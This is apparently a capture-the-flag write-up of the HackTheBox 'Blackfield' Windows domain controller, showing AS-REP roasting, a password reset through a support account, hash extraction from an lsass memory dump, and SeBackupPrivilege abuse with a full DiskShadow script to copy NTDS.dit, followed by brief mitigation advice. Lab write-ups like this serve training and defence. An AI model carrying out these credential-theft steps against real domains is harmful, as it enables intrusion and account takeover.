I know the sky is not the limit because there are footprints on the Moon — and I made some of them! #Buzz Aldrin
Background
Blackfield is a Windows machine from HackTheBox, that is focusing on the enumeration technique, for training your ethical hacking skills and penetration testing skills.
After basic enumeration, this Windows server was a Domain Controller (DC) in the blackfield.local domain. After reconnaissance, a set of user's account was publicly available to view. This DC used Kerberos service. With this user list, I got a non-preauth AS_REP response. Finally, I got the access of a user 'support' account.
Using this support account, I reset the password of a user "Audit2020" and got access to this account. This account has the access rights on the ‘forensic’ shared folder and through this shared folder I could download several files, among others lass.dmp. Decode this file, I got the NTLM hash of the user account svc_backup.
This svc_backup account is the service account for system backup that is a member of the Security Group ‘Backup Operators’. This account has rights to back the critical file, NTDS.dit , and also has permission to execute the program DiskShadow.exe.
After retrieved the NTDS file and decoded it, I go the NTLM hash of the administrative account.
130n@calvinlai.com
Target Machine: 10.10.10.192
Attacker Machine: 10.10.14.8
Knowledge
Windows
Active Directory
Powershell
Account Misconfiguration
Kerberoasting
File System Forensics
Hacking Process Part 0 – Service Scanning
Quick Pre-searching
Details Analysis
Enumeration strategies
According to the nmap result, the target machine is a Domain Controller in the backfield.local , this server has the hostname DC01, the interesting ports are tcp/445 for SMB, 88/tcp for Kerberos, and 389/tcp for LDAP.
Check SMB (445)
Check kerberos-sec (88)
Check LDAP (339)
Hacking Process Part 1 – Enumeration
SMB Enumeration
Started with the enumeration of the SMB protocol by checking the default account access, but nothing information returned. After that, using enum4linux gethered the SMB service of target machine and didn't have any usful information.
Two shared folders (forensic, profiles$) are found using the smbclient and a list of user profile folder list is found at the //10.10.10.192/profiles$. It may be useful, let check this user list using
Hacking Process Part 2 – Initial Low Privilege Access
Enumeration through RPC
As the target provides the AD service, let use the folder name to create a user list file and check with GetNPUsers.py program to find out the "real" user account actually present in the Active Directory and try to capture the NTLM hash.
Exported the shares to a file named ‘userlist.txt’, and check of the usernames are existing and if they have Kerberos pre-authentication enabled, using the parament -format john that sent founded captured Ticket-Gain-Tickets to john for cracking.
Finally, the following three accounts existed at the Active Directory and the password of "support was found.
1. audit2020
2. support
3. svc_backup
Initial access with the account "support"
Login the "blackfield.local/support" account with the password ":#00^BlackKnight". It was confirmed that the user list and user gourp of the AD service. After futher recon, this account cannot access other SMB share folder and no other information can be found under this .
Before swithing to other strategy, if it is a "support" account, can I do some support service, such as create account, reset account password...etc.
Googled an article explains how to change a password via rpcclient. Finally, I was able to change the password of the account audit2020 to ‘abcd@1234’.
This user account can access the share folder "forensic". Jumped to this user "aduit2020", however, no luck to get the user flag. It is not the target user account.
I downloaded all the files at this forensic account and found a interesting file lass.DMP under memory_analysis folder.
~$ smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
Enter BLACKFIELD.LOCAL\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
7846143 blocks of size 4096. 4108744 blocks available
smb: \> smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (3.8 KiloBytes/sec) (average 3.8 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (6.8 KiloBytes/sec) (average 5.3 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (110.8 KiloBytes/sec) (average 41.6 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (1284.4 KiloBytes/sec) (average 642.4 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (12.2 KiloBytes/sec) (average 548.4 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (27.6 KiloBytes/sec) (average 483.6 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (28.1 KiloBytes/sec) (average 432.6 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (30.2 KiloBytes/sec) (average 389.7 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (69.2 KiloBytes/sec) (average 360.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1599.9 KiloBytes/sec) (average 1523.4 KiloBytes/sec)
getting file \memory_analysis\ctfmon.zip of size 24962333 as ctfmon.zip (1704.1 KiloBytes/sec) (average 1589.8 KiloBytes/sec)
getting file \memory_analysis\dfsrs.zip of size 23993305 as dfsrs.zip (1727.9 KiloBytes/sec) (average 1625.5 KiloBytes/sec)
getting file \memory_analysis\dllhost.zip of size 18366396 as dllhost.zip (1628.9 KiloBytes/sec) (average 1626.1 KiloBytes/sec)
getting file \memory_analysis\ismserv.zip of size 8810157 as ismserv.zip (1689.3 KiloBytes/sec) (average 1630.8 KiloBytes/sec)
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1658.7 KiloBytes/sec) (average 1638.2 KiloBytes/sec)
memory_analysis\lsass.DMP
There is a program "volatility" under tool folder which can be used for analyzing memory dumps. This lasass.DMP may be the dump result from lsass.exe, which contains the password hash.
Tried read out the lsass.dmp using different method, first I tried with volatility to read out the DMP file, but couldn’t get it to work on my Kali machine. Finally, used the Python version of Mimikatz, pypykatz. Lucky, another user account "svc_backup" was found with a NTLM hash.
The support account has the support fuction, audit account can access the backup file, will this svc_backup account has system backup function?
Starting check who am i and what access rights I have, A quick check on the privileges of this account that this user is member of the group "Backup Operations" and it have two ‘extra’ privileges, i.e. SeBackupPrivilege and SeRestorePrivilege which are able to back-up critical system files on this Domain Controller.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 11:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
My target is to get the NTDS.dit file by creating a Volume Shadow Copy which the files are being locked. In addition, I need the SYSTEM hive from the registry which is containing the boot key, which is used to decrypt the NTDS.dit.
Googled, diskshadow.exe is the program to useto create Volume Shadow Snapshots (VSS) of disks and expose them as a folder or as a Driveletter.
Get the NTDS.dit
Even the SeBackupPrivilege is enable, but the system security still not allow me to dump the ntds.dit file. First we need to get the permissions in the file NTDS.dit by following the instruction of this https://github.com/giuliano108/SeBackupPrivilege
Once I have the privileges, next steps, execute the program DiskShadow.exe with the scripts (DiskShadow.exe /s ), which is creating a Volume Shadow Copy and expose the VSS with the Driveletter Z:.
set context persistent nowriters
set metadata c:\temp\example.cab
set verbose on
begin backup
add volume c:\ alias systemvolume
create
expose %systemvolume% z:
end backup
Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/22/2020 3:00:44 PM
-> set context persistent nowriters
-> set metadata c:\temp\example.cab
-> set verbose on
-> begin backup
-> add volume c:\ alias systemvolume
-> create
Alias systemvolume for shadow ID {a402221f-ec65-43af-b956-3e2baa45fa43} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2520bff5-0a72-46f3-b718-e47519722936} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis5346.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {2520bff5-0a72-46f3-b718-e47519722936}
* Shadow copy ID = {a402221f-ec65-43af-b956-3e2baa45fa43} %systemvolume%
- Shadow copy set: {2520bff5-0a72-46f3-b718-e47519722936} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/22/2020 3:00:44 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %systemvolume% z:
-> %systemvolume% = {a402221f-ec65-43af-b956-3e2baa45fa43}
The shadow copy was successfully exposed as z:\.
-> end backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Using the Copy-FileSeBackupPrivilege to get the ntds.dit file and the system.bak (the key of this ntds) that get from the registry
*Evil-WinRM* PS C:\Users\Administrator\desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\desktop> systeminfo
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA435
Original Install Date: 2/1/2020, 12:04:40 PM
System Boot Time: 9/23/2020, 3:11:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: fr;French (France)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,540 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,387 MB
Virtual Memory: In Use: 1,412 MB
Page File Location(s): C:\pagefile.sys
Domain: BLACKFIELD.local
Logon Server: \\DC01
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4552924
[02]: KB4494174
[03]: KB4512577
[04]: KB4523204
[05]: KB4537759
[06]: KB4549947
[07]: KB4565349
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.192
[02]: fe80::fc75:4ec7:3972:a98a
[03]: dead:beef::fc75:4ec7:3972:a98a
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Recommendation
This Lab is a sample of Kerberoasting attack, how to prevent it....
Mitigating the brute-forcing aspect of the attack, using the offline brute-force attack the hash dump file to get the initial access acount. Choosing a strong complex password for system account.
SMB Sharing, becareful what kinds of information be shared that may be used to exploitation. If I cannot get the potential user account list, the brute-force attack cannot be success.
Think about what your service accounts have access to, special privilege account can be a risk vectors for unauthorized access.
